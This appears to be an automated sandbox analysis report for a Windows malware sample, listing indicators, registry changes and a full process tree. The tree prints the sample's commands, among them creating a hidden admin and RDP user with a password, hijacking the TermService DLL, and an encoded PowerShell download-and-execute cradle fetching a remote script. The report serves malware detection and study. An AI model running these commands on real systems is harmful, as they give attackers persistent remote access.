Analysis
-
max time kernel
77s -
max time network
139s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
11-11-2020 11:08
Static task
static1
Behavioral task
behavioral1
Sample
f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe
Resource
win10v20201028
General
-
Target
f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe
-
Size
3.4MB
-
MD5
09fd827d8b404557a5c9e06810247c12
-
SHA1
592cec34a644689ea9337a1da194707f795adc14
-
SHA256
f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342
-
SHA512
6808ccdda230ad235cd6322c264c834783febd71a6f658f7d81df30c1689bf10c0b305978f65d1c4c572d0afce2b811b32494ed3f3f476e97ffc923c5c18060a
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 26 1620 powershell.exe 28 1620 powershell.exe 29 1620 powershell.exe 30 1620 powershell.exe 32 1620 powershell.exe 34 1620 powershell.exe 36 1620 powershell.exe 38 1620 powershell.exe 40 1620 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 188 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 2364 2364 -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB975.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ifkpbtiu.15w.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB965.tmp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB954.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_0gwgrw0g.o5v.psm1 powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB943.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBA41.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Modifies data under HKEY_USERS 217 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 28 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 29 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 30 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 32 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepid process 188 powershell.exe 188 powershell.exe 188 powershell.exe 188 powershell.exe 188 powershell.exe 188 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious use of AdjustPrivilegeToken 77 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 188 powershell.exe Token: SeIncreaseQuotaPrivilege 188 powershell.exe Token: SeSecurityPrivilege 188 powershell.exe Token: SeTakeOwnershipPrivilege 188 powershell.exe Token: SeLoadDriverPrivilege 188 powershell.exe Token: SeSystemProfilePrivilege 188 powershell.exe Token: SeSystemtimePrivilege 188 powershell.exe Token: SeProfSingleProcessPrivilege 188 powershell.exe Token: SeIncBasePriorityPrivilege 188 powershell.exe Token: SeCreatePagefilePrivilege 188 powershell.exe Token: SeBackupPrivilege 188 powershell.exe Token: SeRestorePrivilege 188 powershell.exe Token: SeShutdownPrivilege 188 powershell.exe Token: SeDebugPrivilege 188 powershell.exe Token: SeSystemEnvironmentPrivilege 188 powershell.exe Token: SeRemoteShutdownPrivilege 188 powershell.exe Token: SeUndockPrivilege 188 powershell.exe Token: SeManageVolumePrivilege 188 powershell.exe Token: 33 188 powershell.exe Token: 34 188 powershell.exe Token: 35 188 powershell.exe Token: 36 188 powershell.exe Token: SeIncreaseQuotaPrivilege 188 powershell.exe Token: SeSecurityPrivilege 188 powershell.exe Token: SeTakeOwnershipPrivilege 188 powershell.exe Token: SeLoadDriverPrivilege 188 powershell.exe Token: SeSystemProfilePrivilege 188 powershell.exe Token: SeSystemtimePrivilege 188 powershell.exe Token: SeProfSingleProcessPrivilege 188 powershell.exe Token: SeIncBasePriorityPrivilege 188 powershell.exe Token: SeCreatePagefilePrivilege 188 powershell.exe Token: SeBackupPrivilege 188 powershell.exe Token: SeRestorePrivilege 188 powershell.exe Token: SeShutdownPrivilege 188 powershell.exe Token: SeDebugPrivilege 188 powershell.exe Token: SeSystemEnvironmentPrivilege 188 powershell.exe Token: SeRemoteShutdownPrivilege 188 powershell.exe Token: SeUndockPrivilege 188 powershell.exe Token: SeManageVolumePrivilege 188 powershell.exe Token: 33 188 powershell.exe Token: 34 188 powershell.exe Token: 35 188 powershell.exe Token: 36 188 powershell.exe Token: SeIncreaseQuotaPrivilege 188 powershell.exe Token: SeSecurityPrivilege 188 powershell.exe Token: SeTakeOwnershipPrivilege 188 powershell.exe Token: SeLoadDriverPrivilege 188 powershell.exe Token: SeSystemProfilePrivilege 188 powershell.exe Token: SeSystemtimePrivilege 188 powershell.exe Token: SeProfSingleProcessPrivilege 188 powershell.exe Token: SeIncBasePriorityPrivilege 188 powershell.exe Token: SeCreatePagefilePrivilege 188 powershell.exe Token: SeBackupPrivilege 188 powershell.exe Token: SeRestorePrivilege 188 powershell.exe Token: SeShutdownPrivilege 188 powershell.exe Token: SeDebugPrivilege 188 powershell.exe Token: SeSystemEnvironmentPrivilege 188 powershell.exe Token: SeRemoteShutdownPrivilege 188 powershell.exe Token: SeUndockPrivilege 188 powershell.exe Token: SeManageVolumePrivilege 188 powershell.exe Token: 33 188 powershell.exe Token: 34 188 powershell.exe Token: 35 188 powershell.exe Token: 36 188 powershell.exe -
Suspicious use of WriteProcessMemory 68 IoCs
Processes:
f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3976 wrote to memory of 188 3976 f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe powershell.exe PID 3976 wrote to memory of 188 3976 f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe powershell.exe PID 188 wrote to memory of 3436 188 powershell.exe csc.exe PID 188 wrote to memory of 3436 188 powershell.exe csc.exe PID 3436 wrote to memory of 744 3436 csc.exe cvtres.exe PID 3436 wrote to memory of 744 3436 csc.exe cvtres.exe PID 188 wrote to memory of 2468 188 powershell.exe reg.exe PID 188 wrote to memory of 2468 188 powershell.exe reg.exe PID 188 wrote to memory of 2740 188 powershell.exe reg.exe PID 188 wrote to memory of 2740 188 powershell.exe reg.exe PID 188 wrote to memory of 2748 188 powershell.exe reg.exe PID 188 wrote to memory of 2748 188 powershell.exe reg.exe PID 188 wrote to memory of 1144 188 powershell.exe net.exe PID 188 wrote to memory of 1144 188 powershell.exe net.exe PID 1144 wrote to memory of 1232 1144 net.exe net1.exe PID 1144 wrote to memory of 1232 1144 net.exe net1.exe PID 188 wrote to memory of 2308 188 powershell.exe cmd.exe PID 188 wrote to memory of 2308 188 powershell.exe cmd.exe PID 2308 wrote to memory of 1608 2308 cmd.exe cmd.exe PID 2308 wrote to memory of 1608 2308 cmd.exe cmd.exe PID 1608 wrote to memory of 3356 1608 cmd.exe net.exe PID 1608 wrote to memory of 3356 1608 cmd.exe net.exe PID 3356 wrote to memory of 4092 3356 net.exe net1.exe PID 3356 wrote to memory of 4092 3356 net.exe net1.exe PID 188 wrote to memory of 4048 188 powershell.exe cmd.exe PID 188 wrote to memory of 4048 188 powershell.exe cmd.exe PID 4048 wrote to memory of 1404 4048 cmd.exe cmd.exe PID 4048 wrote to memory of 1404 4048 cmd.exe cmd.exe PID 1404 wrote to memory of 744 1404 cmd.exe net.exe PID 1404 wrote to memory of 744 1404 cmd.exe net.exe PID 744 wrote to memory of 740 744 net.exe net1.exe PID 744 wrote to memory of 740 744 net.exe net1.exe PID 1624 wrote to memory of 3252 1624 cmd.exe net.exe PID 1624 wrote to memory of 3252 1624 cmd.exe net.exe PID 3252 wrote to memory of 3268 3252 net.exe net1.exe PID 3252 wrote to memory of 3268 3252 net.exe net1.exe PID 3568 wrote to memory of 2168 3568 cmd.exe net.exe PID 3568 wrote to memory of 2168 3568 cmd.exe net.exe PID 2168 wrote to memory of 2156 2168 net.exe net1.exe PID 2168 wrote to memory of 2156 2168 net.exe net1.exe PID 2736 wrote to memory of 8 2736 cmd.exe net.exe PID 2736 wrote to memory of 8 2736 cmd.exe net.exe PID 8 wrote to memory of 2420 8 net.exe net1.exe PID 8 wrote to memory of 2420 8 net.exe net1.exe PID 1336 wrote to memory of 4092 1336 cmd.exe net.exe PID 1336 wrote to memory of 4092 1336 cmd.exe net.exe PID 4092 wrote to memory of 2580 4092 net.exe net1.exe PID 4092 wrote to memory of 2580 4092 net.exe net1.exe PID 2308 wrote to memory of 2372 2308 cmd.exe net.exe PID 2308 wrote to memory of 2372 2308 cmd.exe net.exe PID 2372 wrote to memory of 1720 2372 net.exe net1.exe PID 2372 wrote to memory of 1720 2372 net.exe net1.exe PID 3808 wrote to memory of 636 3808 cmd.exe net.exe PID 3808 wrote to memory of 636 3808 cmd.exe net.exe PID 636 wrote to memory of 640 636 net.exe net1.exe PID 636 wrote to memory of 640 636 net.exe net1.exe PID 2168 wrote to memory of 1232 2168 cmd.exe WMIC.exe PID 2168 wrote to memory of 1232 2168 cmd.exe WMIC.exe PID 2468 wrote to memory of 2888 2468 cmd.exe WMIC.exe PID 2468 wrote to memory of 2888 2468 cmd.exe WMIC.exe PID 2580 wrote to memory of 3012 2580 cmd.exe cmd.exe PID 2580 wrote to memory of 3012 2580 cmd.exe cmd.exe PID 3012 wrote to memory of 1620 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 1620 3012 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe"C:\Users\Admin\AppData\Local\Temp\f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zoqd1035\zoqd1035.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4ED1.tmp" "c:\Users\Admin\AppData\Local\Temp\zoqd1035\CSC463BC4AF188A4A8598802B9627B669C5.TMP"4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin mHhAj97g /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin mHhAj97g /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin mHhAj97g /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin mHhAj97g1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin mHhAj97g2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin mHhAj97g3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
- Suspicious use of WriteProcessMemory
-
